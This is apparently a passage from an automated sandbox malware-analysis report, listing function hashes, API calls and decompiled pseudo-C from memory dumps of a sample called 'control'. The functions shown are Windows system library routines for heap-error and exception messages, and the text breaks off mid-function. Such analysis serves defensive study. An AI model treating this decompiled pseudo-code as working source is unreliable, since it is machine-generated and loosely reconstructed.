              • Instruction ID: 48fe6523a97866b10478ae9bedf8756d0aa7533a70472703e2fc5765403e17dc
              • Opcode Fuzzy Hash: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction Fuzzy Hash: 28D0957F0445521BF752F3A05D808F2370DE5C525D32CAC95D5CD0F149C411404547E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EEDA20 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,02EE8233,?), ref: 02EEDA4B
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
              • Instruction ID: 55f5c8e49cd288188aba6925878eef63a9550ef6516891fd052f2ec65d54bf70
              • Opcode Fuzzy Hash: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
              • Instruction Fuzzy Hash: 73D0A77168030477FE10E6E48C43F2636CC9B48A44F458064FA0DDB3C2EA60F1104564
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EEDA17 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,02EE8233,?), ref: 02EEDA4B
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 588910df517dd3444f402f0a84021eee09c58ae95d64afcc9ffe1e84b71307d9
              • Instruction ID: 1009691f83314daef7ec003b5f390c0b5f34ed7b97f872b9efbd5a4a0d8d4709
              • Opcode Fuzzy Hash: 588910df517dd3444f402f0a84021eee09c58ae95d64afcc9ffe1e84b71307d9
              • Instruction Fuzzy Hash: 7BC0C0C38C830203FD01D1F03C0271B440D1A9051CB0CD144F40DC4183F710C1200021
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C0967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 944d786986ae0bd03e762eda9e50bdb0877064a6053b5836fd48a101b0df82c8
              • Instruction ID: 80b4861fc4d14b5fbfc2baeee482f7efc97bba03b29ff47f61112db0c2d1337d
              • Opcode Fuzzy Hash: 944d786986ae0bd03e762eda9e50bdb0877064a6053b5836fd48a101b0df82c8
              • Instruction Fuzzy Hash: B9B09BF19014D5C5F751D76046087177E1177D1745F26C551D1030645B4778E191F5B5
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 04C7B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              • an invalid address, %p, xrefs: 04C7B4CF
              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04C7B47D
              • The instruction at %p tried to %s , xrefs: 04C7B4B6
              • a NULL pointer, xrefs: 04C7B4E0
              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C7B38F
              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04C7B39B
              • *** then kb to get the faulting stack, xrefs: 04C7B51C
              • The critical section is owned by thread %p., xrefs: 04C7B3B9
              • Go determine why that thread has not released the critical section., xrefs: 04C7B3C5
              • *** An Access Violation occurred in %ws:%s, xrefs: 04C7B48F
              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04C7B484
              • This failed because of error %Ix., xrefs: 04C7B446
              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04C7B314
              • The resource is owned exclusively by thread %p, xrefs: 04C7B374
              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C7B3D6
              • The resource is owned shared by %d threads, xrefs: 04C7B37E
              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04C7B2F3
              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04C7B305
              • *** Resource timeout (%p) in %ws:%s, xrefs: 04C7B352
              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04C7B2DC
              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04C7B323
              • *** enter .exr %p for the exception record, xrefs: 04C7B4F1
              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04C7B476
              • *** enter .cxr %p for the context, xrefs: 04C7B50D
              • read from, xrefs: 04C7B4AD, 04C7B4B2
              • write to, xrefs: 04C7B4A6
              • <unknown>, xrefs: 04C7B27E, 04C7B2D1, 04C7B350, 04C7B399, 04C7B417, 04C7B48E
              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04C7B53F
              • The instruction at %p referenced memory at %p., xrefs: 04C7B432
              • *** Inpage error in %ws:%s, xrefs: 04C7B418
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
              • API String ID: 0-108210295
              • Opcode ID: 67227fbf2a3aad3a5da24145d23b5582120a366a79d2b934dc6d5fd90a5ceb74
              • Instruction ID: 3ebb941afca3e67b1007110e8460ba7314f25eefa064824635c901a085f77264
              • Opcode Fuzzy Hash: 67227fbf2a3aad3a5da24145d23b5582120a366a79d2b934dc6d5fd90a5ceb74
              • Instruction Fuzzy Hash: BE811335A40200FFEB255A058C45DBF3F2BEF46B99F444084F5052B131F7A5B991EAB6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C81C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
              Download Yara Rule
              C-Code - Quality: 44%
              			E04C81C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4ba48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04BCB150();
				} else {
					E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4cb589c);
				E04BCB150("Heap error detected at %p (heap handle %p)\n",  *0x4cb58a0);
				_t27 =  *0x4cb5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04C81E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04BCB150();
				} else {
					E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04BCB150("Error code: %d - %s\n",  *0x4cb5898);
				_t113 =  *0x4cb58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04BCB150();
					} else {
						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04BCB150("Parameter1: %p\n",  *0x4cb58a4);
				}
				_t115 =  *0x4cb58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04BCB150();
					} else {
						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04BCB150("Parameter2: %p\n",  *0x4cb58a8);
				}
				_t117 =  *0x4cb58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04BCB150();
					} else {
						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04BCB150("Parameter3: %p\n",  *0x4cb58ac);
				}
				_t119 =  *0x4cb58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04BCB150();
					} else {
						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4cb58b4);
					E04BCB150("Last known valid blocks: before - %p, after - %p\n",  *0x4cb58b0);
				} else {
					_t120 =  *0x4cb58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04BCB150();
				} else {
					E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04BCB150("Stack trace available at %p\n", 0x4cb58c0);
			}











              0x04c81c10
              0x04c81c16
              0x04c81c1e
              0x04c81c3d
              0x04c81c3e
              0x04c81c20
              0x04c81c35
              0x04c81c3a
              0x04c81c44
              0x04c81c55
              0x04c81c5a
              0x04c81c65
              0x04c81c67
              0x00000000
              0x04c81c6e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04c81c67
              0x04c81cdc
              0x04c81ce5
              0x04c81d04
              0x04c81d05
              0x04c81ce7
              0x04c81cfc
              0x04c81d01
              0x04c81d0b
              0x04c81d17
              0x04c81d1f
              0x04c81d25
              0x04c81d30
              0x04c81d4f
              0x04c81d50
              0x04c81d32
              0x04c81d47
              0x04c81d4c
              0x04c81d61
              0x04c81d67
              0x04c81d68
              0x04c81d6e
              0x04c81d79
              0x04c81d98
              0x04c81d99
              0x04c81d7b
              0x04c81d90
              0x04c81d95
              0x04c81daa
              0x04c81db0
              0x04c81db1
              0x04c81db7
              0x04c81dc2
              0x04c81de1
              0x04c81de2
              0x04c81dc4
              0x04c81dd9
              0x04c81dde
              0x04c81df3
              0x04c81df9
              0x04c81dfa
              0x04c81e00
              0x04c81e0a
              0x04c81e13
              0x04c81e32
              0x04c81e33
              0x04c81e15
              0x04c81e2a
              0x04c81e2f
              0x04c81e39
              0x04c81e4a
              0x04c81e02
              0x04c81e02
              0x04c81e08
              0x00000000
              0x00000000
              0x04c81e08
              0x04c81e5b
              0x04c81e7a
              0x04c81e7b
              0x04c81e5d
              0x04c81e72
              0x04c81e77
              0x04c81e95

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
              • API String ID: 0-2897834094
              • Opcode ID: 572e44521b228ee5e763ea95e0f1834ac1a6c86a9b8e6d92600ea0898dd93ab8
              • Instruction ID: 9644c4585fc4af74f4c32d2f5537d914357b9ec81bc1bbbaa8ce9f88cfa8ea28
              • Opcode Fuzzy Hash: 572e44521b228ee5e763ea95e0f1834ac1a6c86a9b8e6d92600ea0898dd93ab8
              • Instruction Fuzzy Hash: FC61E637664150DFE211BB85E485F7873E9EB04A39B0D80EEF44A5B320DA65FC528E89
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BD3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E04BD3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04BD1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04BD1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04BD1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04BD1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04BD1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04BE4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04C0F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04C11370(_t276, 0x4ba4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04C0BB40(0,  &_v68, _t170);
									if(L04BD43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04C0BB40(_t257,  &_v68, _t243);
								if(L04BD43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04C11370(_t278, 0x4ba4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04BE4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04C0F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04C11370(_v16, 0x4ba4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04C0BB40(_t262,  &_v68, _t244);
								if(L04BD43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04C11370(_t282, 0x4ba4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04C0BB40(_t262,  &_v68, _t201);
							if(L04BD43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04BE4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04C0F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04C11370(_t280, 0x4ba4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04C0BB40(_t267,  &_v68, _t245);
							if(L04BD43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04C11370(_t284, 0x4ba4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04C0BB40(_t267,  &_v68, _t224);
						if(L04BD43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































              0x04bd3d3c
              0x04bd3d42
              0x04bd3d44
              0x04bd3d46
              0x04bd3d49
              0x04bd3d4c
              0x04bd3d4f
              0x04bd3d52
              0x04bd3d55
              0x04bd3d58
              0x04bd3d5b
              0x04bd3d5f
              0x04bd3d61
              0x04bd3d66
              0x04c28213
              0x04c28218
              0x04bd4085
              0x04bd4088
              0x04bd408e
              0x04bd4094
              0x04bd409a
              0x04bd40a0
              0x04bd40a6
              0x04bd40a9
              0x04bd40af
              0x04bd40b6
              0x04bd40bd
              0x04bd40bd
              0x04bd3d83
              0x04c2821f
              0x04c28229
              0x04c28238
              0x04c28238
              0x04c2823d
              0x04c2823d
              0x04bd3da0
              0x04bd3daf
              0x04bd3db5
              0x04bd3dba
              0x04bd3dba
              0x04bd3dd4
              0x04bd3e94
              0x04bd3eab
              0x04bd3f6d
              0x04bd3f84
              0x04bd406b
              0x04bd406b
              0x04bd406e
              0x04bd406e
              0x04bd4070
              0x04bd4074
              0x04c28351
              0x04c28351
              0x04bd407a
              0x04bd407f
              0x04c2835d
              0x04c28370
              0x04c28377
              0x04c28379
              0x04c2837c
              0x04c2837c
              0x04c2835d
              0x00000000
              0x04bd407f
              0x04bd3f8a
              0x04bd3f8d
              0x04bd3f90
              0x04bd3f95
              0x04c2830d
              0x04c2830f
              0x04bd3f9b
              0x04bd3fac
              0x04bd3fae
              0x04bd3fb1
              0x04bd3fb1
              0x04bd3fb6
              0x04c28317
              0x04c2831a
              0x00000000
              0x04bd3fbc
              0x04bd3fc1
              0x04bd3fc9
              0x04bd3fd7
              0x04bd3fda
              0x04bd3fdd
              0x04bd4021
              0x04bd4021
              0x04bd4029
              0x04bd4030
              0x04bd4044
              0x04bd4046
              0x04bd4046
              0x04bd4044
              0x04bd4049
              0x04c28327
              0x04c28334
              0x04c28339
              0x04c2833c
              0x04bd404f
              0x04bd404f
              0x04bd404f
              0x04bd4051
              0x04bd4056
              0x04bd4063
              0x04bd4063
              0x04bd4068
              0x00000000
              0x04bd4068
              0x04bd3fdf
              0x04bd3fe2
              0x04bd3fe4
              0x04bd3fe7
              0x04bd3fef
              0x04bd4003
              0x04bd4005
              0x04bd4005
              0x04bd400c
              0x04bd4013
              0x04bd4016
              0x04bd4017
              0x04bd401b
              0x04bd401e
              0x00000000
              0x04bd401e
              0x04bd3fb6
              0x04bd3eb1
              0x04bd3eb4
              0x04bd3eb7
              0x04bd3ebc
              0x04c282a9
              0x04c282ab
              0x04bd3ec2
              0x04bd3ed3
              0x04bd3ed5
              0x04bd3ed8
              0x04bd3ed8
              0x04bd3edd
              0x04c282b3
              0x04c282b6
              0x00000000
              0x04bd3ee3
              0x04bd3ee8
              0x04bd3eed
              0x04bd3ef0
              0x04bd3ef3
              0x04bd3f02
              0x04bd3f05
              0x04bd3f08
              0x04c282c0
              0x04c282c3
              0x04c282c5
              0x04c282c8
              0x04c282d0
              0x04c282e4
              0x04c282e6
              0x04c282e6
              0x04c282ed
              0x04c282f4
              0x04c282f7
              0x04c282f8
              0x04c282fc
              0x04c282ff
              0x04c282ff
              0x04bd3f0e
              0x04bd3f11
              0x04bd3f16
              0x04bd3f1d
              0x04bd3f31
              0x04c28307
              0x04c28307
              0x04bd3f31
              0x04bd3f39
              0x04bd3f48
              0x04bd3f4d
              0x04bd3f50
              0x04bd3f50
              0x04bd3f53
              0x04bd3f58
              0x04bd3f65
              0x04bd3f65
              0x04bd3f6a
              0x00000000
              0x04bd3f6a
              0x04bd3edd
              0x04bd3dda
              0x04bd3ddd
              0x04bd3de0
              0x04bd3de5
              0x04c28245
              0x04bd3deb
              0x04bd3df7
              0x04bd3dfc
              0x04bd3dfe
              0x04bd3e01
              0x04bd3e01
              0x04bd3e06
              0x04c2824d
              0x04c2824f
              0x04c28254
              0x00000000
              0x04bd3e0c
              0x04bd3e11
              0x04bd3e16
              0x04bd3e19
              0x04bd3e29
              0x04bd3e2c
              0x04bd3e2f
              0x04c2825c
              0x04c2825f
              0x04c28261
              0x04c28264
              0x04c2826c
              0x04c28280
              0x04c28282
              0x04c28282
              0x04c28289
              0x04c28290
              0x04c28293
              0x04c28294
              0x04c28298
              0x04c2829b
              0x04c2829b
              0x04bd3e35
              0x04bd3e38
              0x04bd3e3d
              0x04bd3e44
              0x04bd3e58
              0x04c282a3
              0x04c282a3
              0x04bd3e58
              0x04bd3e60
              0x04bd3e6f
              0x04bd3e74
              0x04bd3e77
              0x04bd3e77
              0x04bd3e7a
              0x04bd3e7f
              0x04bd3e8c
              0x04bd3e8c
              0x04bd3e91
              0x00000000
              0x04bd3e91

              Strings
              • Kernel-MUI-Number-Allowed, xrefs: 04BD3D8C
              • Kernel-MUI-Language-SKU, xrefs: 04BD3F70
              • Kernel-MUI-Language-Disallowed, xrefs: 04BD3E97
              • Kernel-MUI-Language-Allowed, xrefs: 04BD3DC0
              • WindowsExcludedProcs, xrefs: 04BD3D6F
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              • Opcode ID: 36155f220c491515a86a21f64f4c908ed059e15f6f9325aa19999c0a9a0667e3
              • Instruction ID: 5876cfe4ab29925eb29a60be42520e8b777be6187e36a8fa9cdd6fcdb5558337
              • Opcode Fuzzy Hash: 36155f220c491515a86a21f64f4c908ed059e15f6f9325aa19999c0a9a0667e3
              • Instruction Fuzzy Hash: AFF16072D00219EFDB15DF98C940AEEBBB9FF48750F1401AAE905A7251E774AE00DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BD7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E04BD7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
